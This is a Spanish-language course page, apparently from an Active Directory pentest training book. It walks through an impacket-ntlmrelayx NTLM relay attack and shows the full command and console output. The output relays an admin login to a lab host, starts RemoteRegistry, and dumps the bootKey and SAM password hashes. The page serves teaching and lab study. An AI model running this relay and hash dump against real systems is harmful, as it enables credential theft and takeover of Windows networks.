> For the complete documentation index, see [llms.txt](https://books.spartan-cybersec.com/cpad/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://books.spartan-cybersec.com/cpad/vulnerabilidades-y-ataques-en-ad/relay-attacks/utilizando-impacket-ntlmrelayx/analisis-de-impacket-ntlmrelayx.md).

# Análisis de impacket-ntlmrelayx

1. <mark style="color:red;">**Configuración del Ataque**</mark><mark style="color:red;">:</mark>
   * El comando ejecutado `impacket-ntlmrelayx --no-http-server -smb2support -t smb://10.0.1.249` configura un ataque de retransmisión NTLM.
   * `--no-http-server`: Indica que no se debe iniciar un servidor HTTP para la retransmisión.
   * `-smb2support`: Habilita el soporte para SMB versión 2.
   * `-t smb://10.0.1.249`: Define el objetivo del ataque, en este caso, un servidor con la dirección IP `10.0.1.249` accesible a través del protocolo SMB.
2. <mark style="color:red;">**Carga de Protocolos Cliente**</mark><mark style="color:red;">:</mark>
   * La herramienta carga varios protocolos cliente, como DCSYNC, LDAPS, LDAP, IMAP(S), SMTP, HTTP(S), MSSQL, SMB y RPC. Esto significa que está preparada para retransmitir credenciales a través de cualquiera de estos protocolos.
3. <mark style="color:red;">**Establecimiento de Servidores**</mark><mark style="color:red;">:</mark>
   * Configura varios servidores, incluyendo SMB, WCF y un servidor RAW en el puerto 6666, para escuchar conexiones entrantes y posiblemente retransmitirlas.
4. <mark style="color:red;">**Ataque de Retransmisión**</mark><mark style="color:red;">:</mark>
   * Recibe una conexión desde `10.0.1.100` y autentica exitosamente contra el objetivo `smb://10.0.1.249` como `SPARTANCYBERSEC/ADMIN`.
   * Luego de controlar la conexión, indica que no hay más objetivos disponibles.
5. <mark style="color:red;">**Explotación y Extracción de Hashes**</mark><mark style="color:red;">:</mark>
   * La herramienta manipula servicios en el sistema objetivo, como iniciar el servicio `RemoteRegistry`.
   * Extrae el `bootKey` del sistema objetivo, que es esencial para descifrar hashes almacenados localmente.
   * Finalmente, vuelca los hashes del SAM (Security Accounts Manager) del sistema objetivo, incluyendo cuentas de usuario como `Administrator`, `Guest`, `DefaultAccount`, entre otras.

```bash
┌──(root㉿kali)-[/home/kali]
└─# impacket-ntlmrelayx --no-http-server -smb2support -t smb://10.0.1.249
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Protocol Client DCSYNC loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client RPC loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666

[*] Servers started, waiting for connections
[*] SMBD-Thread-4 (process_request_thread): Received connection from 10.0.1.100, attacking target smb://10.0.1.249
[*] Authenticating against smb://10.0.1.249 as SPARTANCYBERSEC/ADMIN SUCCEED
[*] SMBD-Thread-6 (process_request_thread): Connection from 10.0.1.100 controlled, but there are no more targets left!
[*] SMBD-Thread-7 (process_request_thread): Connection from 10.0.1.100 controlled, but there are no more targets left!
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xea7b3f466f263386e6dc165bcde0d1d2
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:f47f6266f4bb428db65cd949e7537f52:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:d7da45674bae3a0476c0f64b67121f7d:::
prueba:1005:aad3b435b51404eeaad3b435b51404ee:ac1dbef8523bafece1428e067c1b114f:::
gerh:1006:aad3b435b51404eeaad3b435b51404ee:ac1dbef8523bafece1428e067c1b114f:::
demo:1010:aad3b435b51404eeaad3b435b51404ee:ac1dbef8523bafece1428e067c1b114f:::
Jorl:1011:aad3b435b51404eeaad3b435b51404ee:ac1dbef8523bafece1428e067c1b114f:::
[*] Done dumping SAM hashes for host: 10.0.1.249
[*] Stopping service RemoteRegistry
```


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://books.spartan-cybersec.com/cpad/vulnerabilidades-y-ataques-en-ad/relay-attacks/utilizando-impacket-ntlmrelayx/analisis-de-impacket-ntlmrelayx.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.